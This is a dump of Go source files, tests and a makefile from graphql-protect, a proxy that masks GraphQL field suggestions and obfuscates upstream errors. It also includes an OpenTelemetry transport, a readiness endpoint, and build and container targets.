| } 55 | 56 | return proxy, nil 57 | } 58 | 59 | func modifyResponse(blockFieldSuggestions *block_field_suggestions.BlockFieldSuggestionsHandler, obfuscateUpstreamErrors *obfuscate_upstream_errors.ObfuscateUpstreamErrors, logGraphqlErrors bool, log *slog.Logger) func(res *http.Response) error { 60 | return func(res *http.Response) error { 61 | 62 | // read raw response bytes 63 | bodyBytes, _ := io.ReadAll(res.Body) 64 | 
defer res.Body.Close() 65 | 66 | var response map[string]interface{} 67 | err := json.Unmarshal(bodyBytes, &response) 68 | if err != nil { 69 | // if we cannot decode just return 70 | // make sure to set body back to original bytes 71 | res.Body = io.NopCloser(bytes.NewBuffer(bodyBytes)) 72 | return nil 73 | } 74 | 75 | if logGraphqlErrors && response["errors"] != nil { 76 | log.Info("Graphql error", "body", response["errors"]) 77 | } 78 | 79 | if blockFieldSuggestions != nil && blockFieldSuggestions.Enabled() { 80 | response = blockFieldSuggestions.ProcessBody(response) 81 | } 82 | 83 | if obfuscateUpstreamErrors != nil && obfuscateUpstreamErrors.Enabled() { 84 | response = obfuscateUpstreamErrors.ProcessBody(response) 85 | } 86 | 87 | bts, err := json.Marshal(response) 88 | if err != nil { 89 | // if we cannot marshall just return 90 | // make sure to set body back to original bytes 91 | res.Body = io.NopCloser(bytes.NewBuffer(bodyBytes)) 92 | return nil 93 | } 94 | 95 | buffer := bytes.NewBuffer(bts) 96 | res.ContentLength = int64(buffer.Len()) 97 | res.Header.Set("Content-Length", strconv.Itoa(buffer.Len())) 98 | res.Body = io.NopCloser(buffer) 99 | 100 | return nil 101 | } 102 | } 103 | -------------------------------------------------------------------------------- /internal/http/proxy/proxy_test.go: -------------------------------------------------------------------------------- 1 | package proxy 2 | 3 | import ( 4 | "github.com/supportivefe/graphql-protect/internal/business/rules/block_field_suggestions" 5 | "github.com/stretchr/testify/assert" 6 | "io" 7 | "net/http" 8 | "net/http/httptest" 9 | "net/url" 10 | "strings" 11 | "testing" 12 | "time" 13 | ) 14 | 15 | func Test_modifyResponse(t *testing.T) { 16 | type args struct { 17 | blockFieldSuggestions *block_field_suggestions.BlockFieldSuggestionsHandler 18 | response *http.Response 19 | } 20 | tests := []struct { 21 | name string 22 | args args 23 | want func(res *http.Response) 24 | }{ 25 | { 26 | name: 
"nothing if disabled", 27 | args: args{ 28 | blockFieldSuggestions: func() *block_field_suggestions.BlockFieldSuggestionsHandler { 29 | return block_field_suggestions.NewBlockFieldSuggestionsHandler(block_field_suggestions.Config{ 30 | Enabled: false, 31 | }) 32 | }(), 33 | response: func() *http.Response { 34 | return &http.Response{ 35 | Status: "200", 36 | StatusCode: 200, 37 | Body: io.NopCloser(strings.NewReader("this is not valid json")), 38 | Proto: "HTTP/1.1", 39 | ProtoMajor: 1, 40 | ProtoMinor: 1, 41 | ContentLength: 0, 42 | Header: map[string][]string{}, 43 | } 44 | }(), // nolint:bodyclose 45 | }, 46 | want: func(res *http.Response) { 47 | body, _ := io.ReadAll(res.Body) 48 | assert.Equal(t, 200, res.StatusCode) 49 | assert.Equal(t, "200", res.Status) 50 | assert.Equal(t, "this is not valid json", string(body)) 51 | }, 52 | }, 53 | { 54 | name: "handles non-json gracefully", 55 | args: args{ 56 | blockFieldSuggestions: func() *block_field_suggestions.BlockFieldSuggestionsHandler { 57 | return block_field_suggestions.NewBlockFieldSuggestionsHandler(block_field_suggestions.Config{ 58 | Enabled: true, 59 | }) 60 | }(), 61 | response: func() *http.Response { 62 | return &http.Response{ 63 | Status: "200", 64 | StatusCode: 200, 65 | Body: io.NopCloser(strings.NewReader("this is not valid json")), 66 | Proto: "HTTP/1.1", 67 | ProtoMajor: 1, 68 | ProtoMinor: 1, 69 | ContentLength: 0, 70 | Header: map[string][]string{}, 71 | } 72 | }(), // nolint:bodyclose 73 | }, 74 | want: func(res *http.Response) { 75 | body, _ := io.ReadAll(res.Body) 76 | assert.Equal(t, 200, res.StatusCode) 77 | assert.Equal(t, "200", res.Status) 78 | assert.Equal(t, "this is not valid json", string(body)) 79 | }, 80 | }, 81 | { 82 | name: "handles invalid-json gracefully", 83 | args: args{ 84 | blockFieldSuggestions: func() *block_field_suggestions.BlockFieldSuggestionsHandler { 85 | return block_field_suggestions.NewBlockFieldSuggestionsHandler(block_field_suggestions.Config{ 86 | 
Enabled: true, 87 | }) 88 | }(), 89 | response: func() *http.Response { // nolint:bodyclose 90 | return &http.Response{ 91 | Status: "200", 92 | StatusCode: 200, 93 | Body: io.NopCloser(strings.NewReader("{ \"this\": \" is not valid json }")), 94 | Proto: "HTTP/1.1", 95 | ProtoMajor: 1, 96 | ProtoMinor: 1, 97 | ContentLength: 0, 98 | Header: map[string][]string{}, 99 | } 100 | }(), // nolint:bodyclose 101 | }, 102 | want: func(res *http.Response) { 103 | body, _ := io.ReadAll(res.Body) 104 | assert.Equal(t, 200, res.StatusCode) 105 | assert.Equal(t, "200", res.Status) 106 | assert.Equal(t, "{ \"this\": \" is not valid json }", string(body)) 107 | }, 108 | }, 109 | { 110 | name: "handles json gracefully", 111 | args: args{ 112 | blockFieldSuggestions: func() *block_field_suggestions.BlockFieldSuggestionsHandler { 113 | return block_field_suggestions.NewBlockFieldSuggestionsHandler(block_field_suggestions.Config{ 114 | Enabled: true, 115 | Mask: "[masked]", 116 | }) 117 | }(), 118 | response: func() *http.Response { 119 | return &http.Response{ 120 | Status: "200", 121 | StatusCode: 200, 122 | Body: io.NopCloser(strings.NewReader("{ \"errors\": [{\"message\": \"Did you mean \"}] }")), 123 | Proto: "HTTP/1.1", 124 | ProtoMajor: 1, 125 | ProtoMinor: 1, 126 | ContentLength: 0, 127 | Header: map[string][]string{}, 128 | } 129 | }(), // nolint:bodyclose 130 | }, 131 | want: func(res *http.Response) { 132 | body, _ := io.ReadAll(res.Body) 133 | assert.Equal(t, 200, res.StatusCode) 134 | assert.Equal(t, "200", res.Status) 135 | assert.Equal(t, "{\"errors\":[{\"message\":\"[masked]\"}]}", string(body)) 136 | }, 137 | }, 138 | } 139 | for _, tt := range tests { 140 | t.Run(tt.name, func(_ *testing.T) { 141 | result := modifyResponse(tt.args.blockFieldSuggestions, nil, false, nil) // nolint:bodyclose 142 | 143 | _ = result(tt.args.response) 144 | tt.want(tt.args.response) 145 | }) 146 | } 147 | } 148 | 149 | func TestForwardsXff(t *testing.T) { 150 | rr := &RequestRecorder{} 
151 | testServer := httptest.NewServer(rr) 152 | upstreamURL, err := url.Parse(testServer.URL) 153 | assert.NoError(t, err) 154 | 155 | cfg := Config{ 156 | Timeout: 1 * time.Second, 157 | KeepAlive: 180 * time.Second, 158 | Host: "http://" + upstreamURL.Host, 159 | Tracing: TracingConfig{}, 160 | } 161 | proxy, err := NewProxy(cfg, nil, nil, false, nil) 162 | assert.NoError(t, err) 163 | 164 | req := httptest.NewRequest(http.MethodGet, "/", nil) 165 | req.Header.Set("x-forwarded-for", "123.456.789.0") 166 | 167 | w := httptest.NewRecorder() 168 | 169 | proxy.ServeHTTP(w, req) 170 | 171 | rr.Assert(func(r *http.Request) { 172 | val := r.Header.Get("x-forwarded-for") 173 | assert.True(t, strings.HasPrefix(val, "123.456.789.0,")) // trailing , to make sure IP of protect is appended to list 174 | }) 175 | } 176 | 177 | type RequestRecorder struct { 178 | lastRequest *http.Request 179 | } 180 | 181 | func (r *RequestRecorder) ServeHTTP(_ http.ResponseWriter, request *http.Request) { 182 | r.lastRequest = request 183 | } 184 | 185 | func (r *RequestRecorder) Assert(assert func(r *http.Request)) { 186 | assert(r.lastRequest) 187 | } 188 | -------------------------------------------------------------------------------- /internal/http/proxy/transport.go: -------------------------------------------------------------------------------- 1 | package proxy 2 | 3 | import ( 4 | "context" 5 | "go.opentelemetry.io/contrib/instrumentation/net/http/httptrace/otelhttptrace" 6 | "go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp" 7 | "net" 8 | "net/http" 9 | "net/http/httptrace" 10 | ) 11 | 12 | func NewTransport(cfg Config) http.RoundTripper { 13 | return otelhttp.NewTransport( 14 | &http.Transport{ 15 | Proxy: http.ProxyFromEnvironment, 16 | DialContext: (&net.Dialer{ 17 | Timeout: cfg.Timeout, 18 | KeepAlive: cfg.KeepAlive, 19 | }).DialContext, 20 | }, 21 | otelhttp.WithSpanNameFormatter(spanNameFormatter), 22 | otelhttp.WithClientTrace(newClientTrace(cfg.Tracing))) 23 
| } 24 | 25 | func spanNameFormatter(_ string, _ *http.Request) string { 26 | return "Proxy to target GraphQL Server" 27 | } 28 | 29 | func newClientTrace(conf TracingConfig) func(ctx context.Context) *httptrace.ClientTrace { 30 | return func(ctx context.Context) *httptrace.ClientTrace { 31 | return otelhttptrace.NewClientTrace(ctx, otelhttptrace.WithRedactedHeaders(conf.RedactedHeaders...)) 32 | } 33 | } 34 | -------------------------------------------------------------------------------- /internal/http/readiness/readiness.go: -------------------------------------------------------------------------------- 1 | package readiness 2 | 3 | import ( 4 | "fmt" 5 | "net/http" 6 | ) 7 | 8 | func NewReadinessHandler() http.HandlerFunc { 9 | return func(w http.ResponseWriter, _ *http.Request) { 10 | w.WriteHeader(http.StatusOK) 11 | _, _ = fmt.Fprintf(w, "I'm ready!") 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /internal/http/readiness/readiness_test.go: -------------------------------------------------------------------------------- 1 | package readiness 2 | 3 | import ( 4 | "github.com/stretchr/testify/assert" 5 | "io" 6 | "net/http" 7 | "net/http/httptest" 8 | "testing" 9 | ) 10 | 11 | func TestNewReadinessHandler(t *testing.T) { 12 | tests := []struct { 13 | name string 14 | want func(t *testing.T, res *http.Response) 15 | }{ 16 | { 17 | name: "Sends a 200 status code with an \"I'm ready!\" body", 18 | want: func(t *testing.T, res *http.Response) { 19 | assert.Equal(t, http.StatusOK, res.StatusCode) 20 | payload, _ := io.ReadAll(res.Body) 21 | assert.Equal(t, "I'm ready!", string(payload)) 22 | }, 23 | }, 24 | } 25 | for _, tt := range tests { 26 | t.Run(tt.name, func(t *testing.T) { 27 | req := httptest.NewRequest("GET", "/", nil) 28 | 29 | handler := NewReadinessHandler() 30 | resp := httptest.NewRecorder() 31 | 32 | handler.ServeHTTP(resp, req) 33 | 34 | res := resp.Result() 35 | defer res.Body.Close() 36 | 37 | 
tt.want(t, res) 38 | }) 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /makefile: -------------------------------------------------------------------------------- 1 | 2 | SHORT_HASH = $(shell git rev-parse --short HEAD) 3 | BUILD_DATE = $(shell date -u +'%Y-%m-%dT%H:%M:%SZ') 4 | VERSION = develop 5 | 6 | META_PKG = main 7 | LDFLAGS += -X '$(META_PKG).shortHash=$(SHORT_HASH)' 8 | LDFLAGS += -X '$(META_PKG).build=$(VERSION)' 9 | LDFLAGS += -s -w 10 | 11 | .PHONY: dev.setup 12 | dev.setup: 13 | go mod tidy 14 | go install github.com/golangci/golangci-lint/cmd/golangci-lint@v1.60.1 15 | 16 | .PHONY: build 17 | build: 18 | CGO_ENABLED=0 go build -ldflags "$(LDFLAGS)" -o graphql-protect ./cmd/. 19 | 20 | x-build: 21 | GOOS=linux GOARCH=amd64 make build 22 | 23 | .PHONY: test 24 | test: 25 | go test -v ./... 26 | 27 | .PHONY: lint 28 | ## Runs a linter over the code 29 | lint: 30 | golangci-lint run --timeout 3m 31 | 32 | .PHONY: build_container 33 | build_container: build 34 | docker build . -t graphql-protect --build-arg BUILD_DATE=$(BUILD_DATE) --build-arg VERSION=$(VERSION) --build-arg REVISION=$(SHORT_HASH) 35 | 36 | x_build_container: x-build 37 | docker buildx build --platform="linux/amd64" -t graphql-protect --build-arg BUILD_DATE=$(BUILD_DATE) --build-arg VERSION=$(VERSION) --build-arg REVISION=$(SHORT_HASH) . 38 | 39 | .PHONY: run_container 40 | run_container: build_container 41 | docker run -itd --rm -p 8080:8080 graphql-protect --------------------------------------------------------------------------------